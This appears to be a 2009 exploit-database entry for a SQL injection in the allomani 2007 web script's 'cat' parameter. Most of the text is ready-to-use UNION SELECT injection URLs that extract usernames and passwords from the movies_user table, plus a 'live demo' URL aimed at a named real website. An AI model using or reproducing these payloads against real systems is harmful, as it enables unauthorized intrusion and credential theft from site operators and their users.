allomani 2007 (cat) Remote SQL Injection Vulnerability

2009-08-26T00:00:00
ID 1337DAY-ID-5703
Type zdt
Reporter NeX HaCkeR
Modified 2009-08-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================
allomani 2007 (cat) Remote SQL Injection Vulnerability
======================================================


==================

NaMe: allomani 2007  <= SQL Injection Vulnerability
Author : NeX HackEr

==================

Script site : http://allomani.com

==================

ExplOiT:

 UserName

http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT username,2,3 from movies_user

 Password


http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT password,2,3 from movies_user

 :) 

==================

Live DemO:

http://www.leeen.net/index.php?action=browse&cat=43 and 1=0 UNION AlL SELECT username,2,3 from movies_user




#  0day.today [2018-04-15]  #